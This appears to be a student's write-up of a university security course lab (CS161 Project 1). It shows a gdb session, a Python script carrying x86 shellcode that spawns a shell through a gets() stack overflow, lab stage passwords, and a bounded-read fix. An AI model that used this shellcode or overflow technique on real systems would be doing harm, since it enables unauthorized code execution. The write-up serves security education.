CS161 Project 1


Q0 Customizer

  • Log in as customizer / customizer to obtain the credentials for the next stage.
  • remus - ilearned

Q1 Remus

  • We are asked to use a buffer overflow to inject code and thereby read the access-restricted file README.
orbit.c

 1  #include <stdio.h>
 2
 3  void orbit()
 4  {
 5      char buf[8];
 6      gets(buf);
 7  }
 8
 9  int main()
10  {
11      orbit();
12      return 0;
13  }
  • Notice that gets() performs no bounds check on the input it reads, so the 8-byte buf can be overflowed.
  • Run ./debug-exploit and set a breakpoint at line 5.
gdb
(gdb) b 5
(gdb) r
(gdb) x/16x buf
0xbffffc68: 0xbffffd1c 0xb7ffc165 0x00000000 0x00000000
0xbffffc78: 0xbffffc88 0xb7ffc4d3 0x00000000 0xbffffca0
0xbffffc88: 0xbffffd1c 0xb7ffc6ae 0xb7ffc648 0xb7ffefd8
0xbffffc98: 0xbffffd14 0xb7ffc6ae 0x00000001 0xbffffd14
(gdb) i f
Stack level 0, frame at 0xbffffc80:
eip = 0xb7ffc4ab in orbit (orbit.c:6); saved eip = 0xb7ffc4d3
called by frame at 0xbffffca0
source language c.
Arglist at 0xbffffc78, args:
Locals at 0xbffffc78, Previous frame's sp is 0xbffffc80
Saved registers:
ebp at 0xbffffc78, eip at 0xbffffc7c
  • This gives us the addresses we need: rip (the saved return address) and buf are 20 bytes apart.
Stack layout (higher addresses at the top):

    rip (0xbffffc7c)
    sfp
    compiler padding
    buf (0xbffffc68)
  • Generate the input with the script below: first write 20 bytes of filler to reach rip (0xbffffc7c), then overwrite the value at rip with rip+4 (0xbffffc80) so that the function's return address becomes 0xbffffc80, and finally place SHELLCODE at 0xbffffc80.
egg

#!/usr/bin/env python3

import codecs
import sys

# Write raw bytes rather than UTF-8 so each "\xNN" reaches the program unchanged.
sys.stdout = codecs.getwriter("latin1")(sys.stdout.buffer)

dummy = "\x61"                      # filler byte
Overwrite = "\x80\xfc\xff\xbf"      # rip+4 = 0xbffffc80, little-endian
SHELLCODE = \
"\x6a\x32\x58\xcd\x80\x89\xc3\x89\xc1\x6a" + \
"\x47\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f" + \
"\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50" + \
"\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
for i in range(0, 20):              # 20 bytes: buf + compiler padding + sfp, up to rip
    print(dummy, end="")
print(Overwrite, end="")            # new return address, written over rip
print(SHELLCODE)                    # lands at 0xbffffc80, right after rip
  • Run ./exploit and then type cat README.

Relay module [queued message: 2]

Spigel: Comrade Bosik, the idea that a robot is designing Caltopian spacecrafts is beyond absurd.

Bosik: If you’ve ever seen telemetry logs of Spica, you wouldn’t be so naive.

Next username: spica
Next password: alanguage
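
To close out Q1 from the defender's side, here is the same orbit() with gets() replaced by a bounded line reader that keeps the 8-byte buffer but refuses to write past it. This is example code added to this writeup, not part of the project's starter files; fmemopen() and the feed() helper are only there so the function can be exercised on constructed strings in place of stdin.

```c
#define _POSIX_C_SOURCE 200809L   /* declares fmemopen() */
#include <stdio.h>
#include <string.h>

enum read_status { READ_OK = 0, READ_TRUNCATED = 1, READ_EOF = 2 };
/* Bounded stand-in for gets(): reads one line into buf (at most size-1 chars
 * plus NUL).  An oversized line is cut off and its remainder drained, so it
 * neither overflows buf nor leaks into the next read, and the caller is told. */
enum read_status read_line(char *buf, size_t size, FILE *in)
{
    if (size == 0 || fgets(buf, (int)size, in) == NULL) {
        if (size) buf[0] = '\0';
        return READ_EOF;
    }
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';             /* drop the newline, as gets() did */
        return READ_OK;
    }
    /* No newline in buf: the line either fit exactly or was too long. */
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return READ_OK;                  /* fit exactly, or last line w/o '\n' */
    while (c != '\n' && c != EOF)        /* drain the rest of the long line */
        c = fgetc(in);
    return READ_TRUNCATED;
}

/* orbit() from the project: same 8-byte buffer, gets(buf) replaced. */
enum read_status orbit_safe(FILE *in)
{
    char buf[8];
    return read_line(buf, sizeof buf, in);
}

/* Run orbit_safe() on a constructed string instead of stdin. */
enum read_status feed(const char *text)
{
    FILE *in = fmemopen((void *)text, strlen(text), "r");
    if (in == NULL) return READ_EOF;
    enum read_status s = orbit_safe(in);
    fclose(in);
    return s;
}
int main(void)
{   /* 24-byte line: long enough to have reached rip in the original */
    printf("short=%d long=%d\n", feed("hi\n"), feed("aaaaaaaaaaaaaaaaaaaaaaaa\n"));
    return 0;
}
```

A 7-character line fits exactly and is reported as READ_OK; anything longer is reported as READ_TRUNCATED instead of silently corrupting sfp and rip.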

Q2 Spica

Author: huayi

Published: 2023-08-25

Updated: 2023-08-25